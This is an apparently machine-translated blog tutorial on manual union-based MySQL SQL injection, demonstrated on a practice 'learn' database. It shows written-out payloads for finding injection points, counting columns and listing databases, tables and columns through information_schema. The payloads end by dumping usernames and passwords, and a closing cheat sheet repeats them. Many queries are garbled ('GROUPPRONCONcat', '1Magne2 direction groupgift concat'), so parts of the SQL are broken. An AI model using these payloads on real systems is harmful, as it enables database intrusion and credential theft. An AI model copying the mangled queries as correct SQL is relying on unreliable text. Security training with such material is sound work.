Shulou(Shulou.com)06/01 Report--

Information_schema

SQL Foundation 1.1.What is sql?

SQL (structured query language), that is, structured query language, is the standard language of relational database. SQL is a universal and powerful relational database language, but its function is not just query.

1.2 mysql

MySQL is a relational database management system developed by the Swedish company MySQL AB and currently belongs to the products of Oracle. In addition, MySQL is an associated database management system, which stores data in different tables instead of all data in a large warehouse, which increases speed and flexibility. From Baidu encyclopedia

SQL injection Foundation 2.1What is SQL injection

The so-called SQL injection is to deceive the server into executing malicious SQL commands by inserting SQL commands into the Web form to submit domain names or enter the query string requested by the page. To put it simply, SQL injection is a technique that inserts or modifies background SQL statements to execute code by manipulating input (either a form, a get request, a POST request, etc.).

2.2 causes of SQL injection * *

The main reason for the SQL injection vulnerability is that many web programmers do not strictly judge and filter the legality of user input data when writing code, resulting in this vulnerability in the application.

2.3 methods of mysql injection

There are two common methods for mysql injection:

(1) manual injection.

(2) use tool injection

2.4 mysql manual injection principle

In the manual injection of mysql, we mainly use the information_schema database of mysql, which stores the information of all the databases of the MySQL server. Such as the name of the database, the table of the database, the data type and access of the table column, etc. To put it simply, on this MySQL server, what databases are there, what tables are in each database, what is the field type of each table, what permissions are required for each database to access, and so on, the information is stored in the information_schema database.

Introduction to the basic environment of manual injection of mysql

Related to database: learn, related to table: users.

Table users

3.2 determine the injection point

And 1 display (normal display), and 1 display 2 (abnormal display), but not limited to this. It can also be 3 > 1 (normal display), 3 > 5 (abnormal display), etc.

3.2.1 determine whether there is an injection point in uid

The query statement itself is: SELECT uid,username FROM users WHERE uid=1

Query statement itself

3.2.2 principle of judgment

SELECT uid,username FROM users WHERE uid=1 and 1 # 1

Normal display

SELECT uid,username FROM users WHERE uid=1 and 1: 2

Abnormal display

3.3.3Fields 3.3.1 order by sorting

Order by is mainly used for sorting. The basic usage is: order by [ASC | DESC]

The column name can be the column name after the select, or it can be a number, representing the first column or the first column! The number of query fields can also be judged according to the column names sorted by order by.

3.3.2 check the number of fields in the current query

Its own query statement: SELECT uid,username,phone FROM users WHERE uid=1

Query result by itself

Check the current number of fields (columns): order by

SELECT uid,username,phone FROM users WHERE uid=1 ORDER BY 3

Normal display

SELECT uid,username,phone FROM users WHERE uid=1 ORDER BY 4

Abnormal display

Because only three fields are queried in the statement of the current page query, an exception occurs when the input is sorted by the fourth column. So we can query the number of columns by halving, the former is normal and the latter is abnormal, then the normal is the number of columns in the current query.

3.4 query the location of the field on the page

Joint query data display location, does not hold the condition + union select (if the previous is true, then the page will not see the desired information), can also be the previous condition unchanged + union select + limit mp1. (if you see that the information on the page has the numbers in the union select query, you can also see where the fields are displayed on the page, but it is not applicable if there is too much information in the query, so the previous approach is recommended.)

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,3

Displays the location of the query field on the page

3.5 query basic information

To query the basic information is to use the built-in functions in the database to obtain the information.

1. Version ()-- MySQL version

2. User ()-- user name

3. Database ()-- Database name

4. @ @ datadir-- database path

5. @ @ version_compile_os-- operating system version

We can find out the corresponding information and display it on the page by putting the corresponding function into the number of positions in the display bits of the page.

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT VERSION (), user (), database ()

Query basic information

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT @ @ datadir,@@version_compile_os,database ()

Query basic information

In addition, we can use the string concatenation function to query multiple pieces of information at one time:

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1Magne2 direction groupgift concat (version (), 0x3B department user (), 0x3B department database (), 0x3B department record datadir.0x3B department department)

0x3B is the hexadecimal of the delimiter,;

Use the connection function to query multiple pieces of information

Example of connection function

Advanced search database:

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,SCHEMA_NAME FROM information_schema.SCHEMATA LIMIT 9,1

LIMIT 9d1 starts from the 9th database to query a record, which can be used to query which databases are in the database one by one.

Advanced search database

Only run: SELECT 1, 2, 2, from information_schema.SCHEMATA LIMIT, 8, and 3.

Limit mjinn example

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (SCHEMA_NAME) FROM information_schema.SCHEMATA

Query which databases are in the current connection

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (DISTINCT TABLE_SCHEMA) FROM information_schema.COLUMNS

Query which databases are in the current connection

3.6 look up the table name

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1 and 2 TABLENAME FROM (SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA=learn) a

Error

Here you need to convert the database name to hexadecimal

Convert to hexadecimal

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1 and 2 TABLENAME FROM (SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E) a

Query the specified database table name

Run only SELECT * FROM information_schema.tables WHERE TABLE_SCHEMA=0x6C6561726E

Principle

Principle

Advanced look-up table

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E

Advanced look-up table

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E

Advanced look-up table

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (DISTINCT TABLE_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E

Advanced look-up table

3.7 check the field

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E 2, Columbine name FROM (SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E) a

Look up the field

Here, you can query it through the limit mdirection n loop, or you can use the GROUP_CONCAT function to query it once.

One-time query

Run only SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E AND TABLE_NAME=0x7573657273

Principle

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1PRIVILEGES FROM FROM (SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E) a

Principle

Here you can use limit m _ line n to query one by one (limit m _ m _ 1).

Advanced lookup field

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E

Advanced lookup field

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=0x7573657273

Advanced lookup field

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E

Look up the field

Look up the field

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=0x7573657273

Advanced lookup field

3.8 check field contents

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,username FROM users

Check the contents of the field

Here, you can query one by one using limit mQuery 1, or you can use the GROUP_CONCAT function to query at one time.

Use connection function

SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1, Magi 2, GROUPPRONCONcat (uid,0x3B,username,0x3B,password) FROM users

Join function one-time query

Tool injection

For the use of tools for injection, it is best to make a manual judgment first, and if yes or suspected, you can throw it to the tool for injection.

4.1 SQL injection tool

There are but are not limited to the following tools: sqlmap,BSQL, the mole, pangolin, enema sqli, SQLninja, sqlsus, safe3 sql injector, sql poizon, Ah D, Havij, HDSI3.0, NBSI and so on.

4.2 advantages and disadvantages of tool injection

Tool injection can save a lot of time, but tools alone can not necessarily exploit this loophole, because tools have their own limitations and are not as flexible as manual. To put it simply, if the application has certain filtering, then you need to use manual injection flexibly, and if the program filters the query statement when inserting it into the database, it can simply bypass according to this feature. Such as union select 1, 2, and 3.

Information_schema gives a brief introduction to the above picture.

Used to deepen the understanding of the relevant information involved above. For more information, please check the relevant table information involved in the information_schema database!

Information_schema

Information_schema.columns

Information_schema.schemata

Information_schema.processlist

Information_schema.tables

Information_schema.partitions

The complexity of the above is pure pretence, let's share the simple version of mysql manual injection!

UNION SELECT 1, 2, 3, groupmaker concat (schema_name), 5, 6, 7, from information_schema.schemata, check all databases.

UNION SELECT 1pr 2 TABLENAME FROM information_schema.TABLES WHERE TABLE_SCHEMA=' library name 'look up the table

UNION SELECT 1 and 2 look up the field of Column name FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='learn'

Union select group_concat (field, field) from table name

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.